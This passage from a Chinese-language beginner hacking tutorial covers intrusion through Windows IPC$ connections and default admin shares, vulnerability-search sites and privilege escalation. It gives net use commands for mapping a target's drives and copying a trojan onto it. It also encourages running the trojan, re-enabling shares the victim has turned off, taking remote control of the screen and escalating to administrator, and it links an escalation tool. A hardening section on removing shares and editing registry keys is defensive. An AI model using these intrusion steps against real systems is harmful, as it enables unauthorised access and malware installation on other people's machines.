四、怎样映射和访问默认共享?
答:使用命令net use z: //目标IP/c$ 密码" /user:"用户名" 将对方的c盘映射为自己的z盘,其他盘类推。
假如已和目标建立了ipc$,则能够直接用IP加盘符加$访问。比如 copy muma.exe //IP/d$/path/muma.exe 。或再映射也能够,只是不用用户名和密码了:net use y: //IP/d$ 。然后 copy muma.exe y:/path/muma.exe 。当路径中包含空格时,须用""将路径全引住。
五、如何删除映射和ipc$连接?
答:用命令 net use //IP/ipc$ /del 删除和一个目标的ipc$连接。
用命令 net use z: /del 删除映射的z盘,其他盘类推。
用命令 net use * /del 删除全部。会有提示需要按y确认。
六、连上ipc$然后我能做什么?
答:能使用管理员权限的帐号成功和目标连接ipc$,表示您能够和对方系统做深入“交流”了。您能够使用各种命令行方式的工具(比如pstools系列、Win2000SrvReskit、telnethack等)获得目标信息、管理目标的进程和服务等。假如目标开放了默认共享(没开您就帮他开),您就能够上传木马并运行。也能够用tftp、ftp的办法上传。像dwrcc、VNC、RemoteAdmin等工具(木马)还具备直接控屏的功能。假如是2000server,还能够考虑开启终端服务方便控制。这里提到的工具的使用,请看自带的说明或相关教程。
七、怎样防止别人用ips$和默认共享入侵我?
答:A、一种办法是把ipc$和默认共享都删除了。但重起后还会有。这就需要改注册表。
1,先把已有的删除
net share ipc$ /del
net share admin$ /del
net share c$ /del
…………(有几个删几个)
2,禁止建立空连接
首先运行regedit,找到如下主键[HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Control/LSA]把RestrictAnonymous(DWORD)的键值改为:00000001。
3,禁止自动打开默认共享
对于server版,找到如下主键[HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Services/LanmanServer/Parameters]把AutoShareServer(DWORD)的键值改为:00000000。
对于pro版,则是[HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Services/LanmanServer/Parameters]把AutoShareWks(DWORD)的键值改为:00000000。
B、另一种是关闭ipc$和默认共享依赖的服务(不推荐)
net stop lanmanserver
可能会有提示说,XXX服务也会关闭是否继续。因为更有些次要的服务依赖于lanmanserver。一般情况按y继续就能够了。
C、最简单的办法是配置复杂密码,防止通过ipc$穷举密码。但假如您有其他漏洞,ipc$将为进一步入侵提供方便。
D、更有一个办法就是装防火墙,或端口过滤。防火墙的方法就不说了,端口过滤看这里:
过配置本地策略来禁止139/445端口的连接:
http://www.sixthroom.com/ailan/f ... 2&RootID=284&ID=284
第7章------关于扫描出的漏洞
简单说明:
很多扫描器都有漏洞扫描功能。当您获得了一些主机的漏洞列表时,不要急着把他们帖在论坛上,期望别人来为您分析和告诉您利用的方法。您应该首先尝试自己完成这些。扫描出的漏洞并不是都有用的,一部分漏洞过时了,一部分是误报。假如您希望了解的多一些,最好经常到发布漏洞比较快的网站走一走,漏洞的利用是个不段积累的过程。时间长了相信您就体会到了。
漏洞搜索:
绿盟的引擎 http://www.nsfocus.net/index.php?act=sec_bug
蓝盾的引擎 http://www.landun.org/zhongyao/sousuo.htm
补天网的引擎 http://www.patching.net/otherweb/leak/leakindex.asp
安全焦点的引擎 http://www.xfocus.net/vuln/index.php
小凤居的引擎 http://lilitou1.myetang.com/
相关帖子:
一个CGI漏洞的发现和利用
http://www.sixthroom.com/ailan/f ... 2&RootID=285&ID=285
cgi漏洞大全 http://www.sixthroom.com/ailan/f ... 2&RootID=293&ID=293
常见CGI漏洞及应对二 http://www.sixthroom.com/ailan/f ... 2&RootID=286&ID=286
常见CGI漏洞及应对一 http://www.sixthroom.com/ailan/f ... 2&RootID=287&ID=287
Windows 2000漏洞集锦1 http://www.sixthroom.com/ailan/f ... 2&RootID=288&ID=288
Windows 2000漏洞集锦2 http://www.sixthroom.com/ailan/f ... 2&RootID=289&ID=289
Windows 2000漏洞集锦3
http://www.sixthroom.com/ailan/f ... 2&RootID=290&ID=290
Windows 2000漏洞集锦4
http://www.sixthroom.com/ailan/f ... 2&RootID=291&ID=291
Windows 2000漏洞集锦5
http://www.sixthroom.com/ailan/f ... 2&RootID=292&ID=292
ASP漏洞大全 http://www.sixthroom.com/ailan/f ... 2&RootID=294&ID=294
IIS漏洞整理一 http://www.sixthroom.com/ailan/f ... 2&RootID=295&ID=295
IIS漏洞整理二 http://www.sixthroom.com/ailan/f ... 2&RootID=296&ID=296
中国网络安全响应中央各种漏洞大全 http://www.cns911.com/holes/linux/list.php
第8章------关于提升权限
简单说明:
黑客的最终目标就是得到root(即win中的admin)权限。一个真正的黑客会把一次入侵当做是自己的一件作品,不会轻易放弃,但是有些漏洞(典型的如Unicode漏洞、ASP木马)不能直接获得管理员权限,所以必然需要提升权限。一些新手可能会犯这类错误,以为中了木马、获得了shell就能控制一切。结果就出现“为何不能加用户”、“为何不能开3389”等问题。2000及更高版本os承袭了NT的安全结构,多重机制环环相扣来保障安全,特别是帐户安全。无奈安全系统过于庞大,多少会出现漏洞,于是我们就有机会了。 还要补充一点,就是在拿到一个现成的后门软件,或是个木马的时候,一定要先看看说明。至少您应该知道这个后门运行后的效果吧?更有些人上传了某个后门软件或是木马到目标后就认为完事了,您不执行他就是传个地雷上去又有什么用呢?
相关工具:
erunasx 利用Debug Registers漏洞提升权限 http://www.qq888.com/down/download.asp?Did=796
文章整理:西部数码--专业提供域名注册、虚拟主机服务
http://www.west263.com
以上信息与文章正文是不可分割的一部分,如果您要转载本文章,请保留以上信息,谢谢!
